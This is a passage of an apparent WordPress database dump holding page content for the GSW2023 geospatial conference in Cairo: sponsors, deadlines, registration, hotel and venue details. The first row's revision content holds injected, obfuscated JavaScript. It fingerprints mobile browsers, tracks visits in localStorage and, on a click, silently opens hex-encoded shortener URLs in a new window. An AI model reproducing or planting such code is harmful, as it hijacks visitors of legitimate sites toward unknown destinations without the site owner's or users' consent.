_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 04:27:22','2023-05-17 04:27:22','',3066,'https://gsw2023.com/?p=4511',0,'revision','',0),
(4512,1,'2023-05-17 04:29:26','2023-05-17 04:29:26','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\" css=\".vc_custom_1684297727133{margin-top: 25px !important;}\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\"][vc_column][ultimate_heading main_heading=\"BOOK YOU HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h4>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 